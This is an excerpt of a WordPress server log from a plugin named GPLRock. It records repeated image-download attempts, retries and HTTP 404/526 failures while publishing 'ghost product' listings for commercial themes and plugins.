lms-learning-management-system-education-lms-wordpress-theme (attempt 1/3). HTTP Code: 404, Error: . Retrying... [05-Apr-2026 19:07:12 UTC] GPLRock: Image download failed for product lms-learning-management-system-education-lms-wordpress-theme (attempt 2/3). HTTP Code: 404, Error: . Retrying... [05-Apr-2026 19:07:16 UTC] GPLRock Error: Failed to download image from https://www.gplrock.com/wp-content/uploads/2021/09/LMS-Learning-Management-System-Education-LMS-WordPress-Theme.jpg for product lms-learning-management-system-education-lms-wordpress-theme after 3 attempts. HTTP Code: 404, Error: [05-Apr-2026 19:07:16 UTC] GPLRock WARNING: Image download failed for product lms-learning-management-system-education-lms-wordpress-theme. URL: https://www.gplrock.com/wp-content/uploads/2021/09/LMS-Learning-Management-System-Education-LMS-WordPress-Theme.jpg [05-Apr-2026 19:07:16 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: lms-learning-management-system-education-lms-wordpress-theme [05-Apr-2026 19:07:19 UTC] GPLRock: Image downloaded successfully for product luxeliving-luxury-resort-hotel-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-2e8c7840.jpg [05-Apr-2026 19:07:19 UTC] GPLRock: Using pre-downloaded image for product luxeliving-luxury-resort-hotel-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-2e8c7840.jpg [05-Apr-2026 19:07:19 UTC] GPLRock: Ghost product published with image - Product ID: luxeliving-luxury-resort-hotel-elementor-template-kit [05-Apr-2026 19:07:49 UTC] GPLRock: Image downloaded successfully for product anayoga-yoga-teacher-studio-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e8704f84.webp [05-Apr-2026 19:07:49 UTC] GPLRock: Using pre-downloaded image for product anayoga-yoga-teacher-studio-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e8704f84.webp [05-Apr-2026 19:07:49 UTC] GPLRock: Ghost product published with image - Product ID: anayoga-yoga-teacher-studio-elementor-template-kit [05-Apr-2026 19:07:51 UTC] GPLRock: Image downloaded successfully for product amanah-mosque-islamic-center-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-ae83f34a.webp [05-Apr-2026 19:07:51 UTC] GPLRock: Using pre-downloaded image for product amanah-mosque-islamic-center-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-ae83f34a.webp [05-Apr-2026 19:07:51 UTC] GPLRock: Ghost product published with image - Product ID: amanah-mosque-islamic-center-elementor-template-kit [05-Apr-2026 19:07:53 UTC] GPLRock: Image downloaded successfully for product aman-multipurpose-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e0a3e5c7.jpg [05-Apr-2026 19:07:53 UTC] GPLRock: Using pre-downloaded image for product aman-multipurpose-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e0a3e5c7.jpg [05-Apr-2026 19:07:53 UTC] GPLRock: Ghost product published with image - Product ID: aman-multipurpose-elementor-template-kit [05-Apr-2026 19:07:54 UTC] GPLRock: Image downloaded successfully for product alphacolor-design-printing-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-a699d348.webp [05-Apr-2026 19:07:54 UTC] GPLRock: Using pre-downloaded image for product alphacolor-design-printing-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-a699d348.webp [05-Apr-2026 19:07:54 UTC] GPLRock: Ghost product published with image - Product ID: alphacolor-design-printing-elementor-template-kit [05-Apr-2026 19:07:56 UTC] GPLRock: Image downloaded successfully for product alleat-restaurant-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-95b5a700.webp [05-Apr-2026 19:07:56 UTC] GPLRock: Using pre-downloaded image for product alleat-restaurant-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-95b5a700.webp [05-Apr-2026 19:07:56 UTC] GPLRock: Ghost product published with image - Product ID: alleat-restaurant-elementor-template-kit [05-Apr-2026 19:07:57 UTC] GPLRock: Image downloaded successfully for product alkahraba-electrical-shop-store-woocommerce-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-33ab71ae.jpg [05-Apr-2026 19:07:57 UTC] GPLRock: Using pre-downloaded image for product alkahraba-electrical-shop-store-woocommerce-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-33ab71ae.jpg [05-Apr-2026 19:07:57 UTC] GPLRock: Ghost product published with image - Product ID: alkahraba-electrical-shop-store-woocommerce-elementor-template-kit [05-Apr-2026 19:07:59 UTC] GPLRock: Image downloaded successfully for product hotel-booking-resort-elementor-pro-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-116185ad.jpg [05-Apr-2026 19:07:59 UTC] GPLRock: Using pre-downloaded image for product hotel-booking-resort-elementor-pro-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-116185ad.jpg [05-Apr-2026 19:07:59 UTC] GPLRock: Ghost product published with image - Product ID: hotel-booking-resort-elementor-pro-template-kit [05-Apr-2026 19:08:01 UTC] GPLRock: Image downloaded successfully for product lodge-hotel-resort-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-cfe07d67.webp [05-Apr-2026 19:08:01 UTC] GPLRock: Using pre-downloaded image for product lodge-hotel-resort-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-cfe07d67.webp [05-Apr-2026 19:08:01 UTC] GPLRock: Ghost product published with image - Product ID: lodge-hotel-resort-elementor-template-kit [05-Apr-2026 19:08:03 UTC] GPLRock: Image downloaded successfully for product travelin-travel-tour-booking-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f0d3c355.jpg [05-Apr-2026 19:08:03 UTC] GPLRock: Using pre-downloaded image for product travelin-travel-tour-booking-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f0d3c355.jpg [05-Apr-2026 19:08:03 UTC] GPLRock: Ghost product published with image - Product ID: travelin-travel-tour-booking-elementor-template-kit [05-Apr-2026 19:08:06 UTC] GPLRock: Image downloaded successfully for product laguna-beach-club-lounge-bar-resort-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-f0b52417.webp [05-Apr-2026 19:08:06 UTC] GPLRock: Using pre-downloaded image for product laguna-beach-club-lounge-bar-resort-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-f0b52417.webp [05-Apr-2026 19:08:06 UTC] GPLRock: Ghost product published with image - Product ID: laguna-beach-club-lounge-bar-resort-elementor-template-kit [05-Apr-2026 19:09:32 UTC] GPLRock: Image download failed for product aps-currency-switcher-add-on-for-arena-products-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:09:34 UTC] GPLRock: Image download failed for product aps-currency-switcher-add-on-for-arena-products-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:09:36 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/aps-currency-switcher---add-on-for-arena-products---wordpress-plugin-25400.webp for product aps-currency-switcher-add-on-for-arena-products-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:09:36 UTC] GPLRock: Image download failed for product aps-currency-switcher-add-on-for-arena-products-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:09:38 UTC] GPLRock: Image download failed for product aps-currency-switcher-add-on-for-arena-products-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:09:41 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/aps-currency-switcher---add-on-for-arena-products---wordpress-plugin-25400.webp for product aps-currency-switcher-add-on-for-arena-products-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:09:41 UTC] GPLRock WARNING: Image download failed for product aps-currency-switcher-add-on-for-arena-products-wordpress-plugin. URL: https://meldwp.com/wp-content/uploads/aps-currency-switcher---add-on-for-arena-products---wordpress-plugin-25400.webp [05-Apr-2026 19:09:41 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: aps-currency-switcher-add-on-for-arena-products-wordpress-plugin [05-Apr-2026 19:09:41 UTC] GPLRock: Image download failed for product flexible-table-pricing-matrix-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:09:43 UTC] GPLRock: Image download failed for product flexible-table-pricing-matrix-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:09:45 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/flexible-table-pricing-matrix-for-woocommerce-6610.webp for product flexible-table-pricing-matrix-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:09:45 UTC] GPLRock: Image download failed for product flexible-table-pricing-matrix-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:09:47 UTC] GPLRock: Image download failed for product flexible-table-pricing-matrix-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:09:49 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/flexible-table-pricing-matrix-for-woocommerce-6610.webp for product flexible-table-pricing-matrix-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:09:49 UTC] GPLRock WARNING: Image download failed for product flexible-table-pricing-matrix-for-woocommerce. URL: https://meldwp.com/wp-content/uploads/flexible-table-pricing-matrix-for-woocommerce-6610.webp [05-Apr-2026 19:09:49 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: flexible-table-pricing-matrix-for-woocommerce [05-Apr-2026 19:09:51 UTC] GPLRock: Image downloaded successfully for product daisy-background-color-changer-for-wordpress (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-8c7b4cc0.webp [05-Apr-2026 19:09:51 UTC] GPLRock: Using pre-downloaded image for product daisy-background-color-changer-for-wordpress: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-8c7b4cc0.webp [05-Apr-2026 19:09:51 UTC] GPLRock: Ghost product published with image - Product ID: daisy-background-color-changer-for-wordpress [05-Apr-2026 19:09:51 UTC] GPLRock: Image download failed for product woocommerce-product-addons-custom-fields-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:09:53 UTC] GPLRock: Image download failed for product woocommerce-product-addons-custom-fields-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:09:55 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-product-addons--custom-fields-for-woocommerce-9108.webp for product woocommerce-product-addons-custom-fields-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:09:56 UTC] GPLRock: Image download failed for product woocommerce-product-addons-custom-fields-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:09:58 UTC] GPLRock: Image download failed for product woocommerce-product-addons-custom-fields-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:10:00 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-product-addons--custom-fields-for-woocommerce-9108.webp for product woocommerce-product-addons-custom-fields-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:10:00 UTC] GPLRock WARNING: Image download failed for product woocommerce-product-addons-custom-fields-for-woocommerce. URL: https://meldwp.com/wp-content/uploads/woocommerce-product-addons--custom-fields-for-woocommerce-9108.webp [05-Apr-2026 19:10:00 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-product-addons-custom-fields-for-woocommerce [05-Apr-2026 19:10:00 UTC] GPLRock: Image downloaded successfully for product woocommerce-composite-products-plugin (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-5a3918d7.webp [05-Apr-2026 19:10:00 UTC] GPLRock: Using pre-downloaded image for product woocommerce-composite-products-plugin: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-5a3918d7.webp [05-Apr-2026 19:10:00 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-composite-products-plugin [05-Apr-2026 19:10:00 UTC] GPLRock: Image download failed for product sumo-woocommerce-payment-plans-deposits-down-payments-installments-variable-payments-etc (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:10:02 UTC] GPLRock: Image download failed for product sumo-woocommerce-payment-plans-deposits-down-payments-installments-variable-payments-etc (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:10:04 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/sumo-woocommerce-payment-plans---deposits-down-payments-installments-variable-pa-2244.webp for product sumo-woocommerce-payment-plans-deposits-down-payments-installments-variable-payments-etc after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:10:04 UTC] GPLRock: Image download failed for product sumo-woocommerce-payment-plans-deposits-down-payments-installments-variable-payments-etc (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:10:06 UTC] GPLRock: Image download failed for product sumo-woocommerce-payment-plans-deposits-down-payments-installments-variable-payments-etc (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:10:09 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/sumo-woocommerce-payment-plans---deposits-down-payments-installments-variable-pa-2244.webp for product sumo-woocommerce-payment-plans-deposits-down-payments-installments-variable-payments-etc after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:10:09 UTC] GPLRock WARNING: Image download failed for product sumo-woocommerce-payment-plans-deposits-down-payments-installments-variable-payments-etc. URL: https://meldwp.com/wp-content/uploads/sumo-woocommerce-payment-plans---deposits-down-payments-installments-variable-pa-2244.webp [05-Apr-2026 19:10:09 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: sumo-woocommerce-payment-plans-deposits-down-payments-installments-variable-payments-etc [05-Apr-2026 19:10:09 UTC] GPLRock: Image download failed for product import-entries-for-gravity-forms (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:10:11 UTC] GPLRock: Image download failed for product import-entries-for-gravity-forms (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:10:13 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/import-entries-for-gravity-forms-27712.webp for product import-entries-for-gravity-forms after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:10:13 UTC] GPLRock: Image download failed for product import-entries-for-gravity-forms (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:10:15 UTC] GPLRock: Image download failed for product import-entries-for-gravity-forms (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:10:17 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/import-entries-for-gravity-forms-27712.webp for product import-entries-for-gravity-forms after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:10:17 UTC] GPLRock WARNING: Image download failed for product import-entries-for-gravity-forms. URL: https://meldwp.com/wp-content/uploads/import-entries-for-gravity-forms-27712.webp [05-Apr-2026 19:10:17 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: import-entries-for-gravity-forms [05-Apr-2026 19:10:18 UTC] GPLRock: Image download failed for product woocommerce-quick-order-plugin-bulk-fast-product-ordering (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:10:20 UTC] GPLRock: Image download failed for product woocommerce-quick-order-plugin-bulk-fast-product-ordering (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:10:22 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-quick-order-plugin--bulk--fast-product-ordering-1782.webp for product woocommerce-quick-order-plugin-bulk-fast-product-ordering after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:10:23 UTC] GPLRock: Image download failed for product woocommerce-quick-order-plugin-bulk-fast-product-ordering (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:10:25 UTC] GPLRock: Image download failed for product woocommerce-quick-order-plugin-bulk-fast-product-ordering (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:10:27 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-quick-order-plugin--bulk--fast-product-ordering-1782.webp for product woocommerce-quick-order-plugin-bulk-fast-product-ordering after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:10:27 UTC] GPLRock WARNING: Image download failed for product woocommerce-quick-order-plugin-bulk-fast-product-ordering. URL: https://meldwp.com/wp-content/uploads/woocommerce-quick-order-plugin--bulk--fast-product-ordering-1782.webp [05-Apr-2026 19:10:27 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-quick-order-plugin-bulk-fast-product-ordering [05-Apr-2026 19:10:27 UTC] GPLRock: Image download failed for product post-layout-news-ticker-for-visual-composer (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:10:30 UTC] GPLRock: Image download failed for product post-layout-news-ticker-for-visual-composer (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:10:32 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/post-layout--news-ticker-for-visual-composer-12235.webp for product post-layout-news-ticker-for-visual-composer after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:10:32 UTC] GPLRock: Image download failed for product post-layout-news-ticker-for-visual-composer (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:10:34 UTC] GPLRock: Image download failed for product post-layout-news-ticker-for-visual-composer (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:10:36 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/post-layout--news-ticker-for-visual-composer-12235.webp for product post-layout-news-ticker-for-visual-composer after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:10:36 UTC] GPLRock WARNING: Image download failed for product post-layout-news-ticker-for-visual-composer. URL: https://meldwp.com/wp-content/uploads/post-layout--news-ticker-for-visual-composer-12235.webp [05-Apr-2026 19:10:36 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: post-layout-news-ticker-for-visual-composer [05-Apr-2026 19:10:36 UTC] GPLRock: Image download failed for product eternitylogin-all-in-one-wordpress-login-system (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:10:38 UTC] GPLRock: Image download failed for product eternitylogin-all-in-one-wordpress-login-system (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:10:40 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/eternitylogin-all-in-one-wordpress-login-system-28719.webp for product eternitylogin-all-in-one-wordpress-login-system after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:10:41 UTC] GPLRock: Image download failed for product eternitylogin-all-in-one-wordpress-login-system (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:10:43 UTC] GPLRock: Image download failed for product eternitylogin-all-in-one-wordpress-login-system (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:10:45 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/eternitylogin-all-in-one-wordpress-login-system-28719.webp for product eternitylogin-all-in-one-wordpress-login-system after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:10:45 UTC] GPLRock WARNING: Image download failed for product eternitylogin-all-in-one-wordpress-login-system. URL: https://meldwp.com/wp-content/uploads/eternitylogin-all-in-one-wordpress-login-system-28719.webp [05-Apr-2026 19:10:45 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: eternitylogin-all-in-one-wordpress-login-system [05-Apr-2026 19:11:15 UTC] GPLRock: Image download failed for product accordion-faq-wordpress-faq-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:11:17 UTC] GPLRock: Image downloaded successfully for product publisher-newspaper-magazine-amp (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-4d6a5acb.jpg [05-Apr-2026 19:11:17 UTC] GPLRock: Using pre-downloaded image for product publisher-newspaper-magazine-amp: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-4d6a5acb.jpg [05-Apr-2026 19:11:17 UTC] GPLRock: Ghost product published with image - Product ID: publisher-newspaper-magazine-amp [05-Apr-2026 19:11:17 UTC] GPLRock: Image download failed for product accordion-faq-wordpress-faq-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:11:18 UTC] GPLRock: Image downloaded successfully for product divi-builder-wordpress-plugin (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-87e171f0.jpg [05-Apr-2026 19:11:18 UTC] GPLRock: Using pre-downloaded image for product divi-builder-wordpress-plugin: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-87e171f0.jpg [05-Apr-2026 19:11:18 UTC] GPLRock: Ghost product published with image - Product ID: divi-builder-wordpress-plugin [05-Apr-2026 19:11:19 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/accordion-faq---wordpress-faq-plugin-22763.webp for product accordion-faq-wordpress-faq-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:11:20 UTC] GPLRock: Image download failed for product accordion-faq-wordpress-faq-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:11:20 UTC] GPLRock: Image downloaded successfully for product learndash-lms-wordpress-plugin (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c0fbfdb2.jpg [05-Apr-2026 19:11:20 UTC] GPLRock: Using pre-downloaded image for product learndash-lms-wordpress-plugin: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c0fbfdb2.jpg [05-Apr-2026 19:11:20 UTC] GPLRock: Ghost product published with image - Product ID: learndash-lms-wordpress-plugin [05-Apr-2026 19:11:22 UTC] GPLRock: Image download failed for product accordion-faq-wordpress-faq-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:11:23 UTC] GPLRock: Image download failed for product themify-woocommerce-product-filter (attempt 1/3). HTTP Code: 404, Error: . Retrying... [05-Apr-2026 19:11:24 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/accordion-faq---wordpress-faq-plugin-22763.webp for product accordion-faq-wordpress-faq-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:11:24 UTC] GPLRock WARNING: Image download failed for product accordion-faq-wordpress-faq-plugin. URL: https://meldwp.com/wp-content/uploads/accordion-faq---wordpress-faq-plugin-22763.webp [05-Apr-2026 19:11:24 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: accordion-faq-wordpress-faq-plugin [05-Apr-2026 19:11:25 UTC] GPLRock: Image downloaded successfully for product marketplace-vendor-subdomain-plugin-for-woocommerce (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-f22f2329.webp [05-Apr-2026 19:11:25 UTC] GPLRock: Using pre-downloaded image for product marketplace-vendor-subdomain-plugin-for-woocommerce: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-f22f2329.webp [05-Apr-2026 19:11:25 UTC] GPLRock: Ghost product published with image - Product ID: marketplace-vendor-subdomain-plugin-for-woocommerce [05-Apr-2026 19:11:25 UTC] GPLRock: Image download failed for product modern-video-player-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:11:27 UTC] GPLRock: Image download failed for product modern-video-player-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:11:27 UTC] GPLRock: Image download failed for product themify-woocommerce-product-filter (attempt 2/3). HTTP Code: 404, Error: . Retrying... [05-Apr-2026 19:11:29 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/modern-video-player-for-wordpress-4856.webp for product modern-video-player-for-wordpress after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:11:29 UTC] GPLRock: Image download failed for product modern-video-player-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:11:31 UTC] GPLRock Error: Failed to download image from https://www.gplrock.com/wp-content/uploads/2020/07/Themify-WooCommerce-Product-Filter.jpg for product themify-woocommerce-product-filter after 3 attempts. HTTP Code: 404, Error: [05-Apr-2026 19:11:32 UTC] GPLRock: Image download failed for product modern-video-player-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:11:34 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/modern-video-player-for-wordpress-4856.webp for product modern-video-player-for-wordpress after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:11:34 UTC] GPLRock WARNING: Image download failed for product modern-video-player-for-wordpress. URL: https://meldwp.com/wp-content/uploads/modern-video-player-for-wordpress-4856.webp [05-Apr-2026 19:11:34 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: modern-video-player-for-wordpress [05-Apr-2026 19:11:34 UTC] GPLRock: Image download failed for product themify-woocommerce-product-filter (attempt 1/3). HTTP Code: 404, Error: . Retrying... [05-Apr-2026 19:11:34 UTC] GPLRock: Image download failed for product fivo-docs-wordpress-documents-and-attachments-manager (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:11:36 UTC] GPLRock: Image download failed for product fivo-docs-wordpress-documents-and-attachments-manager (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:11:38 UTC] GPLRock: Image download failed for product themify-woocommerce-product-filter (attempt 2/3). HTTP Code: 404, Error: . Retrying... [05-Apr-2026 19:11:38 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/fivo-docs---wordpress-documents-and-attachments-manager-17702.webp for product fivo-docs-wordpress-documents-and-attachments-manager after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:11:38 UTC] GPLRock: Image download failed for product fivo-docs-wordpress-documents-and-attachments-manager (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:11:41 UTC] GPLRock: Image download failed for product fivo-docs-wordpress-documents-and-attachments-manager (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:11:42 UTC] GPLRock Error: Failed to download image from https://www.gplrock.com/wp-content/uploads/2020/07/Themify-WooCommerce-Product-Filter.jpg for product themify-woocommerce-product-filter after 3 attempts. HTTP Code: 404, Error: [05-Apr-2026 19:11:42 UTC] GPLRock WARNING: Image download failed for product themify-woocommerce-product-filter. URL: https://www.gplrock.com/wp-content/uploads/2020/07/Themify-WooCommerce-Product-Filter.jpg [05-Apr-2026 19:11:42 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: themify-woocommerce-product-filter [05-Apr-2026 19:11:43 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/fivo-docs---wordpress-documents-and-attachments-manager-17702.webp for product fivo-docs-wordpress-documents-and-attachments-manager after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:11:43 UTC] GPLRock WARNING: Image download failed for product fivo-docs-wordpress-documents-and-attachments-manager. URL: https://meldwp.com/wp-content/uploads/fivo-docs---wordpress-documents-and-attachments-manager-17702.webp [05-Apr-2026 19:11:43 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: fivo-docs-wordpress-documents-and-attachments-manager [05-Apr-2026 19:11:43 UTC] GPLRock: Image download failed for product wp-biolink-bio-links-page-builder-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:11:43 UTC] GPLRock: Image downloaded successfully for product woocommerce-variation-swatches-pro (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-46014314.jpg [05-Apr-2026 19:11:44 UTC] GPLRock: Using pre-downloaded image for product woocommerce-variation-swatches-pro: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-46014314.jpg [05-Apr-2026 19:11:44 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-variation-swatches-pro [05-Apr-2026 19:11:45 UTC] GPLRock: Image download failed for product wp-biolink-bio-links-page-builder-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:11:45 UTC] 